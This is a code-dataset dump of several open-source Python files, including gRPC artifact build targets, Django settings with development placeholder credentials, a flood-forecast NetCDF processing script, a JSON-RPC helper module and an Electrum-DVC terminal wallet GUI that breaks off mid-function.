repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
kpayson64/grpc | tools/run_tests/artifacts/artifact_targets.py | 1 | 14711 | #!/usr/bin/env python
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definition of targets to build artifacts."""
import os.path
import random
import string
import sys
sys.path.insert(0, os.path.abspath('..'))
import python_utils.jobset as jobset
def create_docker_jobspec(name,
dockerfile_dir,
shell_command,
environ={},
flake_retries=0,
timeout_retries=0,
timeout_seconds=30 * 60,
docker_base_image=None,
extra_docker_args=None,
verbose_success=False):
"""Creates jobspec for a task running under docker."""
environ = environ.copy()
environ['RUN_COMMAND'] = shell_command
environ['ARTIFACTS_OUT'] = 'artifacts/%s' % name
docker_args = []
for k, v in environ.items():
docker_args += ['-e', '%s=%s' % (k, v)]
docker_env = {
'DOCKERFILE_DIR': dockerfile_dir,
'DOCKER_RUN_SCRIPT': 'tools/run_tests/dockerize/docker_run.sh',
'OUTPUT_DIR': 'artifacts'
}
if docker_base_image is not None:
docker_env['DOCKER_BASE_IMAGE'] = docker_base_image
if extra_docker_args is not None:
docker_env['EXTRA_DOCKER_ARGS'] = extra_docker_args
jobspec = jobset.JobSpec(
cmdline=['tools/run_tests/dockerize/build_and_run_docker.sh'] +
docker_args,
environ=docker_env,
shortname='build_artifact.%s' % (name),
timeout_seconds=timeout_seconds,
flake_retries=flake_retries,
timeout_retries=timeout_retries,
verbose_success=verbose_success)
return jobspec
def create_jobspec(name,
cmdline,
environ={},
shell=False,
flake_retries=0,
timeout_retries=0,
timeout_seconds=30 * 60,
use_workspace=False,
cpu_cost=1.0,
verbose_success=False):
"""Creates jobspec."""
environ = environ.copy()
if use_workspace:
environ['WORKSPACE_NAME'] = 'workspace_%s' % name
environ['ARTIFACTS_OUT'] = os.path.join('..', 'artifacts', name)
cmdline = ['bash', 'tools/run_tests/artifacts/run_in_workspace.sh'
] + cmdline
else:
environ['ARTIFACTS_OUT'] = os.path.join('artifacts', name)
jobspec = jobset.JobSpec(
cmdline=cmdline,
environ=environ,
shortname='build_artifact.%s' % (name),
timeout_seconds=timeout_seconds,
flake_retries=flake_retries,
timeout_retries=timeout_retries,
shell=shell,
cpu_cost=cpu_cost,
verbose_success=verbose_success)
return jobspec
_MACOS_COMPAT_FLAG = '-mmacosx-version-min=10.7'
_ARCH_FLAG_MAP = {'x86': '-m32', 'x64': '-m64'}
class PythonArtifact:
"""Builds Python artifacts."""
def __init__(self, platform, arch, py_version):
self.name = 'python_%s_%s_%s' % (platform, arch, py_version)
self.platform = platform
self.arch = arch
self.labels = ['artifact', 'python', platform, arch, py_version]
self.py_version = py_version
def pre_build_jobspecs(self):
return []
def build_jobspec(self):
environ = {}
if self.platform == 'linux_extra':
# Raspberry Pi build
environ['PYTHON'] = '/usr/local/bin/python{}'.format(
self.py_version)
environ['PIP'] = '/usr/local/bin/pip{}'.format(self.py_version)
# https://github.com/resin-io-projects/armv7hf-debian-qemu/issues/9
# A QEMU bug causes submodule update to hang, so we copy directly
environ['RELATIVE_COPY_PATH'] = '.'
extra_args = ' --entrypoint=/usr/bin/qemu-arm-static '
return create_docker_jobspec(
self.name,
'tools/dockerfile/grpc_artifact_linux_{}'.format(self.arch),
'tools/run_tests/artifacts/build_artifact_python.sh',
environ=environ,
timeout_seconds=60 * 60 * 5,
docker_base_image='quay.io/grpc/raspbian_{}'.format(self.arch),
extra_docker_args=extra_args)
elif self.platform == 'linux':
if self.arch == 'x86':
environ['SETARCH_CMD'] = 'linux32'
# Inside the manylinux container, the python installations are located in
# special places...
environ['PYTHON'] = '/opt/python/{}/bin/python'.format(
self.py_version)
environ['PIP'] = '/opt/python/{}/bin/pip'.format(self.py_version)
# Platform autodetection for the manylinux1 image breaks so we set the
# defines ourselves.
# TODO(atash) get better platform-detection support in core so we don't
# need to do this manually...
environ['CFLAGS'] = '-DGPR_MANYLINUX1=1'
environ['GRPC_BUILD_GRPCIO_TOOLS_DEPENDENTS'] = 'TRUE'
environ['GRPC_BUILD_MANYLINUX_WHEEL'] = 'TRUE'
return create_docker_jobspec(
self.name,
'tools/dockerfile/grpc_artifact_python_manylinux_%s' %
self.arch,
'tools/run_tests/artifacts/build_artifact_python.sh',
environ=environ,
timeout_seconds=60 * 60,
docker_base_image='quay.io/pypa/manylinux1_i686'
if self.arch == 'x86' else 'quay.io/pypa/manylinux1_x86_64')
elif self.platform == 'windows':
if 'Python27' in self.py_version or 'Python34' in self.py_version:
environ['EXT_COMPILER'] = 'mingw32'
else:
environ['EXT_COMPILER'] = 'msvc'
# For some reason, the batch script %random% always runs with the same
# seed. We create a random temp-dir here
dir = ''.join(
random.choice(string.ascii_uppercase) for _ in range(10))
return create_jobspec(
self.name, [
'tools\\run_tests\\artifacts\\build_artifact_python.bat',
self.py_version, '32' if self.arch == 'x86' else '64'
],
environ=environ,
timeout_seconds=45 * 60,
use_workspace=True)
else:
environ['PYTHON'] = self.py_version
environ['SKIP_PIP_INSTALL'] = 'TRUE'
return create_jobspec(
self.name,
['tools/run_tests/artifacts/build_artifact_python.sh'],
environ=environ,
timeout_seconds=60 * 60 * 2,
use_workspace=True)
def __str__(self):
return self.name
class RubyArtifact:
"""Builds ruby native gem."""
def __init__(self, platform, arch):
self.name = 'ruby_native_gem_%s_%s' % (platform, arch)
self.platform = platform
self.arch = arch
self.labels = ['artifact', 'ruby', platform, arch]
def pre_build_jobspecs(self):
return []
def build_jobspec(self):
# Ruby build uses docker internally and docker cannot be nested.
# We are using a custom workspace instead.
return create_jobspec(
self.name, ['tools/run_tests/artifacts/build_artifact_ruby.sh'],
use_workspace=True,
timeout_seconds=45 * 60)
class CSharpExtArtifact:
"""Builds C# native extension library"""
def __init__(self, platform, arch):
self.name = 'csharp_ext_%s_%s' % (platform, arch)
self.platform = platform
self.arch = arch
self.labels = ['artifact', 'csharp', platform, arch]
def pre_build_jobspecs(self):
return []
def build_jobspec(self):
if self.platform == 'windows':
cmake_arch_option = 'Win32' if self.arch == 'x86' else self.arch
return create_jobspec(
self.name, [
'tools\\run_tests\\artifacts\\build_artifact_csharp.bat',
cmake_arch_option
],
use_workspace=True)
else:
environ = {
'CONFIG': 'opt',
'EMBED_OPENSSL': 'true',
'EMBED_ZLIB': 'true',
'CFLAGS': '-DGPR_BACKWARDS_COMPATIBILITY_MODE',
'CXXFLAGS': '-DGPR_BACKWARDS_COMPATIBILITY_MODE',
'LDFLAGS': ''
}
if self.platform == 'linux':
return create_docker_jobspec(
self.name,
'tools/dockerfile/grpc_artifact_linux_%s' % self.arch,
'tools/run_tests/artifacts/build_artifact_csharp.sh',
environ=environ)
else:
archflag = _ARCH_FLAG_MAP[self.arch]
environ['CFLAGS'] += ' %s %s' % (archflag, _MACOS_COMPAT_FLAG)
environ['CXXFLAGS'] += ' %s %s' % (archflag, _MACOS_COMPAT_FLAG)
environ['LDFLAGS'] += ' %s' % archflag
return create_jobspec(
self.name,
['tools/run_tests/artifacts/build_artifact_csharp.sh'],
environ=environ,
use_workspace=True)
def __str__(self):
return self.name
class PHPArtifact:
"""Builds PHP PECL package"""
def __init__(self, platform, arch):
self.name = 'php_pecl_package_{0}_{1}'.format(platform, arch)
self.platform = platform
self.arch = arch
self.labels = ['artifact', 'php', platform, arch]
def pre_build_jobspecs(self):
return []
def build_jobspec(self):
if self.platform == 'linux':
return create_docker_jobspec(
self.name, 'tools/dockerfile/grpc_artifact_linux_{}'.format(
self.arch),
'tools/run_tests/artifacts/build_artifact_php.sh')
else:
return create_jobspec(
self.name, ['tools/run_tests/artifacts/build_artifact_php.sh'],
use_workspace=True)
class ProtocArtifact:
"""Builds protoc and protoc-plugin artifacts"""
def __init__(self, platform, arch):
self.name = 'protoc_%s_%s' % (platform, arch)
self.platform = platform
self.arch = arch
self.labels = ['artifact', 'protoc', platform, arch]
def pre_build_jobspecs(self):
return []
def build_jobspec(self):
if self.platform != 'windows':
cxxflags = '-DNDEBUG %s' % _ARCH_FLAG_MAP[self.arch]
ldflags = '%s' % _ARCH_FLAG_MAP[self.arch]
if self.platform != 'macos':
ldflags += ' -static-libgcc -static-libstdc++ -s'
environ = {
'CONFIG': 'opt',
'CXXFLAGS': cxxflags,
'LDFLAGS': ldflags,
'PROTOBUF_LDFLAGS_EXTRA': ldflags
}
if self.platform == 'linux':
return create_docker_jobspec(
self.name,
'tools/dockerfile/grpc_artifact_protoc',
'tools/run_tests/artifacts/build_artifact_protoc.sh',
environ=environ)
else:
environ[
'CXXFLAGS'] += ' -std=c++11 -stdlib=libc++ %s' % _MACOS_COMPAT_FLAG
return create_jobspec(
self.name,
['tools/run_tests/artifacts/build_artifact_protoc.sh'],
environ=environ,
timeout_seconds=60 * 60,
use_workspace=True)
else:
generator = 'Visual Studio 14 2015 Win64' if self.arch == 'x64' else 'Visual Studio 14 2015'
return create_jobspec(
self.name,
['tools\\run_tests\\artifacts\\build_artifact_protoc.bat'],
environ={'generator': generator},
use_workspace=True)
def __str__(self):
return self.name
def targets():
"""Gets list of supported targets"""
return ([
Cls(platform, arch)
for Cls in (CSharpExtArtifact, ProtocArtifact)
for platform in ('linux', 'macos', 'windows') for arch in ('x86', 'x64')
] + [
PythonArtifact('linux', 'x86', 'cp27-cp27m'),
PythonArtifact('linux', 'x86', 'cp27-cp27mu'),
PythonArtifact('linux', 'x86', 'cp34-cp34m'),
PythonArtifact('linux', 'x86', 'cp35-cp35m'),
PythonArtifact('linux', 'x86', 'cp36-cp36m'),
PythonArtifact('linux_extra', 'armv7', '2.7'),
PythonArtifact('linux_extra', 'armv7', '3.4'),
PythonArtifact('linux_extra', 'armv7', '3.5'),
PythonArtifact('linux_extra', 'armv7', '3.6'),
PythonArtifact('linux_extra', 'armv6', '2.7'),
PythonArtifact('linux_extra', 'armv6', '3.4'),
PythonArtifact('linux_extra', 'armv6', '3.5'),
PythonArtifact('linux_extra', 'armv6', '3.6'),
PythonArtifact('linux', 'x64', 'cp27-cp27m'),
PythonArtifact('linux', 'x64', 'cp27-cp27mu'),
PythonArtifact('linux', 'x64', 'cp34-cp34m'),
PythonArtifact('linux', 'x64', 'cp35-cp35m'),
PythonArtifact('linux', 'x64', 'cp36-cp36m'),
PythonArtifact('macos', 'x64', 'python2.7'),
PythonArtifact('macos', 'x64', 'python3.4'),
PythonArtifact('macos', 'x64', 'python3.5'),
PythonArtifact('macos', 'x64', 'python3.6'),
PythonArtifact('windows', 'x86', 'Python27_32bits'),
PythonArtifact('windows', 'x86', 'Python34_32bits'),
PythonArtifact('windows', 'x86', 'Python35_32bits'),
PythonArtifact('windows', 'x86', 'Python36_32bits'),
PythonArtifact('windows', 'x64', 'Python27'),
PythonArtifact('windows', 'x64', 'Python34'),
PythonArtifact('windows', 'x64', 'Python35'),
PythonArtifact('windows', 'x64', 'Python36'),
RubyArtifact('linux', 'x64'),
RubyArtifact('macos', 'x64'),
PHPArtifact('linux', 'x64'),
PHPArtifact('macos', 'x64')
])
| apache-2.0 | 2,395,240,654,222,034,400 | 37.815303 | 104 | 0.54585 | false |
IQSS/miniverse | miniverse/settings/local_with_routing.py | 1 | 6078 | """
Settings template for running two databases:
- Existing Dataverse databases (we only read it)
- Second database for Django core apps + Miniverse apps
Please read through and change the settings where noted
"""
from __future__ import absolute_import
import sys
from os import makedirs, environ
from os.path import join, isdir
from miniverse.testrunners.disable_migrations import DisableMigrations
from miniverse.settings.base import *
# -----------------------------------
# DEBUG
# - True: Dataverse Key required for API
# - Includes SQL for many of the API call results
# -----------------------------------
DEBUG = True #True False
# -----------------------------------
# TIME_ZONE
# -----------------------------------
TIME_ZONE = 'America/New_York'
# -----------------------------------
# Secret key
# -----------------------------------
SECRET_KEY = 'DEV-j94xnz*dj5f@_6-gt@ov)yjbcx0uagb7sv9a0j-(jo)j%m$el%'
# -----------------------------------
# Metrics cache settings
# -----------------------------------
METRICS_CACHE_VIEW = False
METRICS_CACHE_VIEW_TIME = 60 * 60 * 2 # Cache for visualizations
METRICS_CACHE_API_TIME = 60 * 15 # Cache for API endpoints
# -----------------------------------
# For local runs, this directory will include:
# - static files (after running 'collectstatic')
# - optional, sqlite db if that's used for the Django apps db
# -----------------------------------
LOCAL_SETUP_DIR = join(PROJECT_ROOT, 'test_setup')
if not isdir(LOCAL_SETUP_DIR):
makedirs(LOCAL_SETUP_DIR)
# -----------------------------------
# Database routing.
# e.g. between the Dataverse db and Django db
# -----------------------------------
DATABASE_ROUTERS = ['miniverse.db_routers.db_dataverse_router.DataverseRouter',]
# -----------------------------------
# URL of the Dataverse db being read
# -----------------------------------
#DATAVERSE_INSTALLATION_URL = 'https://demo.dataverse.org'
#DATAVERSE_INSTALLATION_URL = 'https://dataverse.harvard.edu'
DATAVERSE_INSTALLATION_URL = 'http://localhost:8080'
# -----------------------------------
# Database Setup
# - default -> Create a new db for the django/miniverse specific apps
# - May be any relational db type: postgres, sqlite, etc
# - dataverse -> Read-only users for the Dataverse Posgres db
# -----------------------------------
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': join(LOCAL_SETUP_DIR, 'miniverse_default.db3'),
},
'dataverse': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'dvndb', # dvndb_demo, dvn_thedata, dvndb
'USER': 'postgres', # Set to a read-only user
'PASSWORD': '123',
'HOST': 'localhost',
'TEST': {
'MIRROR': 'default', # For running tests, only create 1 db
},
}
}
# -----------------------------------
# Need when running DEBUG = False
# -----------------------------------
ALLOWED_HOSTS = ('127.0.0.1', 'dd7be506.ngrok.io')
# -----------------------------------
# Need to set when RestrictAdminMiddleware is active
# -----------------------------------
INTERNAL_IPS = ('127.0.0.1',)
# -----------------------------------
# Slackbot
# -----------------------------------
SLACK_USERNAME = 'dvbot'
SLACK_BOT_TOKEN = environ.get('SLACK_BOT_TOKEN')
BOT_ID = environ.get('BOT_ID')
SLACK_WEBHOOK_SECRET = environ.get('SLACK_WEBHOOK_SECRET')
# -----------------------------------
# Optional MIDDLEWARE_CLASSES
# -----------------------------------
MIDDLEWARE_CLASSES += [
# Restrict by IP address
#'dv_apps.admin_restrict.middleware.RestrictAdminMiddleware',
# Email about broken 404s
#'django.middleware.common.BrokenLinkEmailsMiddleware',
]
# -----------------------------------
# cookie name
# -----------------------------------
SESSION_COOKIE_NAME = 'dv_metrics'
# -----------------------------------
# Where static files are collected
# -----------------------------------
STATIC_ROOT = join(LOCAL_SETUP_DIR, 'staticfiles')
if not isdir(STATIC_ROOT):
makedirs(STATIC_ROOT)
# -----------------------------------
# Django Debug TOOLBAR CONFIGURATION
# -----------------------------------
# See: http://django-debug-toolbar.readthedocs.org/en/latest/installation.html#explicit-setup
# -----------------------------------
INSTALLED_APPS += (
'debug_toolbar',
'django.contrib.admindocs',
)
MIDDLEWARE_CLASSES += [
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
DEBUG_TOOLBAR_PATCH_SETTINGS = False
# http://django-debug-toolbar.readthedocs.org/en/latest/installation.html
# -----------------------------------
# For running tests:
# - Only create 1 test database it has to be a Postgres db
# - Remove the Database routing
# - Disable migrations. e.g., We don't want to run them
# - Set a new TEST_RUNNER:
# - We want to *create* unmanaged tables in the test db
# - Disable timezone awareness for fixture loading
# -----------------------------------
if 'test' in sys.argv or 'test_coverage' in sys.argv: # Covers regular testing and django-coverage
DATABASES['default']['ENGINE'] = 'django.db.backends.postgresql_psycopg2'
DATABASES['default']['HOST'] = 'localhost'
DATABASES['default']['USER'] = 'postgres'
DATABASES['default']['PASSWORD'] = '123'
# The custom routers we're using to route certain ORM queries
# to the remote host conflict with our overridden db settings.
# Set DATABASE_ROUTERS to an empty list to return to the defaults
# during the test run.
DATABASE_ROUTERS = []
MIGRATION_MODULES = DisableMigrations()
# Set Django's test runner a custom class that will create
# 'unmanaged' tables
TEST_RUNNER = 'miniverse.testrunners.managed_model_test_runner.ManagedModelTestRunner'
# Disable timezone awareness to False to avoid warnings when loading fixtures
# e.g. to avoid: RuntimeWarning: (some object)received a naive datetime (2016-08-16
# 09:25:41.349000) while time zone support is active.
USE_TZ = False
| mit | 906,195,234,186,292,000 | 33.534091 | 99 | 0.557585 | false |
sanluca/py-acqua | setup.py | 1 | 1902 | # -*- coding: iso-8859-15 -*-
#Copyright (C) 2005, 2008 Py-Acqua
#http://www.pyacqua.net
#email: [email protected]
#
#
#Py-Acqua is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
#Py-Acqua is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Py-Acqua; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import sys
import glob
from distutils.core import setup
###
def moon_walk (root_dir, repl):
packages, data_files = [], []
for dirpath, dirnames, filenames in os.walk (root_dir):
for i, dirname in enumerate (dirnames):
if dirname.startswith('.'): del dirnames[i]
data_files.append(("share/pyacqua/" + repl + dirpath[len(root_dir):], [os.path.join(dirpath, f) for f in filenames]))
return data_files
if __name__ != "__main__":
print moon_walk (sys.argv[1])
else:
setup (
name="py-acqua",
version="1.0",
description="PyAcqua program",
author="Francesco Piccinno",
author_email="[email protected]",
url="http://pyacqua.altervista.org",
scripts=["src/acqua.py"],
package_dir={'pyacqua': 'src'},
packages=['pyacqua'],
data_files=moon_walk ("skins", "skins") + moon_walk ("locale", "locale") + [
#("src", glob.glob ("src/*")),
("share/pyacqua/plugins", glob.glob ("plugins/*.py")),
("share/pyacqua/pixmaps", glob.glob ("pixmaps/*")),
("share/pyacqua/tips", ["src/tip_of_the_day_en.txt", "src/tip_of_the_day.txt"])
]
)
| gpl-2.0 | 8,070,389,984,959,156,000 | 32.368421 | 120 | 0.679811 | false |
bhermansyah/DRR-datacenter | scripts/misc-boedy1996/glofas_refactor.py | 1 | 6276 | import os, sys
os.environ.setdefault("DJANGO_SETTINGS_MODULE","geonode.settings")
import csv
from django.db import connection, connections
from django.conf import settings
from geodb.models import Glofasintegrated, AfgBasinLvl4GlofasPoint
from netCDF4 import Dataset, num2date
import numpy as np
from django.contrib.gis.geos import Point
def getRefactorData():
# f_IN = open("/Users/budi/Documents/iMMAP/DRR-datacenter/scripts/misc-boedy1996/Glofas_Baseline_Output_Adjustment_factor.csv", 'rU')
f_IN = open("/home/ubuntu/Glofas_Baseline_Output_Adjustment_factor.csv", 'rU')
reader = csv.reader(f_IN)
first = True
data = {}
for row in reader:
if first:
first = False
else:
lon = row[2]
lat = row[1]
# data[lat][lon]['rl2_factor']=row[8]
data[lat]={lon:{'rl2_factor':row[8],'rl5_factor':row[9],'rl20_factor':row[10]}}
f_IN.close()
# print data['67.75']['31.85']
return data
def calculate_glofas_params(date):
date_arr = date.split('-')
filename = getattr(settings, 'GLOFAS_NC_FILES')+date_arr[0]+date_arr[1]+date_arr[2]+"00.nc"
# print Glofasintegrated.objects.latest('datadate').date
nc = Dataset(filename, 'r', Format='NETCDF4')
# get coordinates variables
lats = nc.variables['lat'][:]
lons = nc.variables['lon'][:]
rl2s= nc.variables['rl2'][:]
rl5s= nc.variables['rl5'][:]
rl20s= nc.variables['rl20'][:]
times = nc.variables['time'][:]
essemble = nc.variables['ensemble'][:]
# convert date, how to store date only strip away time?
# print "Converting Dates"
units = nc.variables['time'].units
dates = num2date (times[:], units=units, calendar='365_day')
d = np.array(nc.variables['dis'])
# header = ['Latitude', 'Longitude', 'rl2', 'rl5', 'rl20', 'rl2_dis_percent', 'rl2_avg_dis_percent', 'rl5_dis_percent', 'rl5_avg_dis_percent', 'rl20_dis_percent', 'rl20_avg_dis_percent']
times_index=[]
for i,j in enumerate(times):
times_index.append(i)
coord_index = 0
refactor = getRefactorData()
for lat, lon, rl2, rl5, rl20 in zip(lats, lons, rl2s, rl5s, rl20s):
# print str(lat), str(lon)
try:
# print refactor[str(lat)][str(lon)]
rl2_temp = rl2*float(refactor[str(lat)][str(lon)]['rl2_factor'])
rl5_temp = rl5*float(refactor[str(lat)][str(lon)]['rl5_factor'])
rl20_temp = rl20*float(refactor[str(lat)][str(lon)]['rl20_factor'])
except:
rl2_temp = rl2
rl5_temp = rl5
rl20_temp = rl20
rl2 = rl2_temp
rl5 = rl5_temp
rl20 = rl20_temp
# print rl2,rl5,rl20, refactor[str(lat)][str(lon)]['rl2_factor']
data_in = []
data_in.append(lat)
data_in.append(lon)
data_in.append(rl2)
data_in.append(rl5)
data_in.append(rl20)
rl2_dis_percent = []
rl5_dis_percent = []
rl20_dis_percent = []
rl2_avg_dis = []
rl5_avg_dis = []
rl20_avg_dis = []
for i in times_index:
data = d[i,:,coord_index]
dis_data = []
for l in data:
dis_data.append(l)
dis_avg = np.median(dis_data)
count = sum(1 for x in data if x>rl2)
percent_rl2 = round(float(count)/float(51)*100)
rl2_avg_dis.append(round(float(dis_avg)/float(rl2)*100))
rl2_dis_percent.append(percent_rl2)
count = sum(1 for x in data if x>rl5)
percent_rl5 = round(float(count)/float(51)*100)
rl5_avg_dis.append(round(float(dis_avg)/float(rl5)*100))
rl5_dis_percent.append(percent_rl5)
count = sum(1 for x in data if x>rl20)
percent_rl20 = round(float(count)/float(51)*100)
rl20_avg_dis.append(round(float(dis_avg)/float(rl20)*100))
rl20_dis_percent.append(percent_rl20)
if i>=19:
break
# print rl2_avg_dis
data_in.append(max(rl2_dis_percent))
temp_avg_dis=[]
for index, item in enumerate(rl2_dis_percent):
if item == max(rl2_dis_percent):
# print index, item
temp_avg_dis.append(rl2_avg_dis[index])
data_in.append(max(temp_avg_dis))
rl2_avg_dis_percent = max(temp_avg_dis)
data_in.append(max(rl5_dis_percent))
temp_avg_dis=[]
for index, item in enumerate(rl5_dis_percent):
if item == max(rl5_dis_percent):
# print index, item
temp_avg_dis.append(rl5_avg_dis[index])
data_in.append(max(temp_avg_dis))
rl5_avg_dis_percent = max(temp_avg_dis)
data_in.append(max(rl20_dis_percent))
temp_avg_dis=[]
for index, item in enumerate(rl20_dis_percent):
if item == max(rl20_dis_percent):
# print index, item
temp_avg_dis.append(rl20_avg_dis[index])
data_in.append(max(temp_avg_dis))
rl20_avg_dis_percent = max(temp_avg_dis)
if coord_index>2035 and max(rl2_dis_percent)>=25:
pnt = Point(round(float(lon),2), round(float(lat),2), srid=4326)
checkdata = AfgBasinLvl4GlofasPoint.objects.filter(geom__intersects=pnt)
for z in checkdata:
p = Glofasintegrated(basin_id=z.value, datadate=date, lon=lon, lat=lat, rl2=rl2, rl5=rl5, rl20=rl20, rl2_dis_percent=max(rl2_dis_percent), rl2_avg_dis_percent=rl2_avg_dis_percent, rl5_dis_percent=max(rl5_dis_percent), rl5_avg_dis_percent=rl5_avg_dis_percent, rl20_dis_percent=max(rl20_dis_percent), rl20_avg_dis_percent=rl20_avg_dis_percent)
p.save()
print coord_index, z.value
coord_index = coord_index+1
# print data_in
# print Glofasintegrated.objects.filter(datadate=date).count()
# if Glofasintegrated.objects.filter(datadate=date).count() == 0 :
# Glofasintegrated(datadate=date).save()
nc.close()
Glofasintegrated.objects.filter(datadate='2017-04-13').delete()
calculate_glofas_params('2017-04-13')
# px = Glofasintegrated.objects.order_by().values('datadate').distinct()
# for i in px:
# print str(i['datadate'])
# Glofasintegrated.objects.filter(datadate=i['datadate']).delete()
# calculate_glofas_params(str(i['datadate']))
| gpl-3.0 | 6,982,054,730,688,295,000 | 33.108696 | 357 | 0.605003 | false |
deavid/bjsonrpc | bjsonrpc/main.py | 1 | 2824 | """
bjson/main.py
Copyright (c) 2010 David Martinez Marti
All rights reserved.
Licensed under 3-clause BSD License.
See LICENSE.txt for the full license text.
"""
import socket
import bjsonrpc.server
import bjsonrpc.connection
import bjsonrpc.handlers
__all__ = [
"createserver",
"connect",
]
def createserver(host="127.0.0.1", port=10123,
handler_factory=bjsonrpc.handlers.NullHandler,
sock=None, http=False):
"""
Creates a *bjson.server.Server* object linked to a listening socket.
Parameters:
**host**
Address (IP or Host Name) to listen to as in *socket.bind*.
Use "0.0.0.0" to listen to all address. By default this points to
127.0.0.1 to avoid security flaws.
**port**
Port number to bind the socket. In Unix, port numbers less
than 1024 requires special permissions.
**handler_factory**
Class to instantiate to publish remote functions.
**(return value)**
A *bjson.server.Server* instance or raises an exception.
Servers are usually created this way::
import bjsonrpc
server = bjsonrpc.createserver("0.0.0.0")
server.serve()
Check :ref:`bjsonrpc.server` documentation
"""
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
sock.listen(3)
return bjsonrpc.server.Server(sock, handler_factory=handler_factory, http=http)
def connect(host="127.0.0.1", port=10123,
sock=None, handler_factory=bjsonrpc.handlers.NullHandler):
"""
Creates a *bjson.connection.Connection* object linked to a connected
socket.
Parameters:
**host**
Address (IP or Host Name) to connect to.
**port**
Port number to connect to.
**handler_factory**
Class to instantiate to publish remote functions to the server.
By default this is *NullHandler* which means that no functions are
executable by the server.
**(return value)**
A *bjson.connection.Connection* instance or raises an exception.
Connections are usually created this way::
import bjsonrpc
conn = bjsonrpc.connect("rpc.host.net")
print conn.call.some_method_in_server_side()
"""
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
return bjsonrpc.connection.Connection(sock, handler_factory=handler_factory)
| bsd-3-clause | 5,525,710,750,083,788,000 | 29.042553 | 83 | 0.596671 | false |
testalt/electrum-dvc | gui/text.py | 1 | 17436 | import curses, datetime, locale
from decimal import Decimal
_ = lambda x:x
#from i18n import _
from electrum_dvc.util import format_satoshis, set_verbosity
from electrum_dvc.bitcoin import is_valid
from electrum_dvc import Wallet, WalletStorage
import tty, sys
class ElectrumGui:
def __init__(self, config, network):
self.config = config
self.network = network
storage = WalletStorage(config)
if not storage.file_exists:
print "Wallet not found. try 'electrum-dvc create'"
exit()
self.wallet = Wallet(storage)
self.wallet.start_threads(self.network)
locale.setlocale(locale.LC_ALL, '')
self.encoding = locale.getpreferredencoding()
self.stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
curses.start_color()
curses.use_default_colors()
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLUE)
curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_CYAN)
self.stdscr.keypad(1)
self.stdscr.border(0)
self.maxy, self.maxx = self.stdscr.getmaxyx()
self.set_cursor(0)
self.w = curses.newwin(10, 50, 5, 5)
set_verbosity(False)
self.tab = 0
self.pos = 0
self.popup_pos = 0
self.str_recipient = ""
self.str_description = ""
self.str_amount = ""
self.str_fee = ""
self.history = None
if self.network:
self.network.register_callback('updated', self.update)
self.network.register_callback('connected', self.refresh)
self.network.register_callback('disconnected', self.refresh)
self.network.register_callback('disconnecting', self.refresh)
self.tab_names = [_("History"), _("Send"), _("Receive"), _("Contacts"), _("Wall")]
self.num_tabs = len(self.tab_names)
def set_cursor(self, x):
try:
curses.curs_set(x)
except Exception:
pass
def restore_or_create(self):
pass
def verify_seed(self):
pass
def get_string(self, y, x):
self.set_cursor(1)
curses.echo()
self.stdscr.addstr( y, x, " "*20, curses.A_REVERSE)
s = self.stdscr.getstr(y,x)
curses.noecho()
self.set_cursor(0)
return s
def update(self):
self.update_history()
if self.tab == 0:
self.print_history()
self.refresh()
def print_history(self):
width = [20, 40, 14, 14]
delta = (self.maxx - sum(width) - 4)/3
format_str = "%"+"%d"%width[0]+"s"+"%"+"%d"%(width[1]+delta)+"s"+"%"+"%d"%(width[2]+delta)+"s"+"%"+"%d"%(width[3]+delta)+"s"
if self.history is None:
self.update_history()
self.print_list(self.history[::-1], format_str%( _("Date"), _("Description"), _("Amount"), _("Balance")))
def update_history(self):
width = [20, 40, 14, 14]
delta = (self.maxx - sum(width) - 4)/3
format_str = "%"+"%d"%width[0]+"s"+"%"+"%d"%(width[1]+delta)+"s"+"%"+"%d"%(width[2]+delta)+"s"+"%"+"%d"%(width[3]+delta)+"s"
b = 0
self.history = []
for item in self.wallet.get_tx_history():
tx_hash, conf, is_mine, value, fee, balance, timestamp = item
if conf:
try:
time_str = datetime.datetime.fromtimestamp( timestamp).isoformat(' ')[:-3]
except Exception:
time_str = "------"
else:
time_str = 'pending'
label, is_default_label = self.wallet.get_label(tx_hash)
self.history.append( format_str%( time_str, label, format_satoshis(value, whitespaces=True), format_satoshis(balance, whitespaces=True) ) )
def print_balance(self):
if not self.network:
msg = _("Offline")
elif self.network.is_connected():
if not self.wallet.up_to_date:
msg = _("Synchronizing...")
else:
c, u = self.wallet.get_balance()
msg = _("Balance")+": %f "%(Decimal( c ) / 100000000)
if u: msg += " [%f unconfirmed]"%(Decimal( u ) / 100000000)
else:
msg = _("Not connected")
self.stdscr.addstr( self.maxy -1, 3, msg)
for i in range(self.num_tabs):
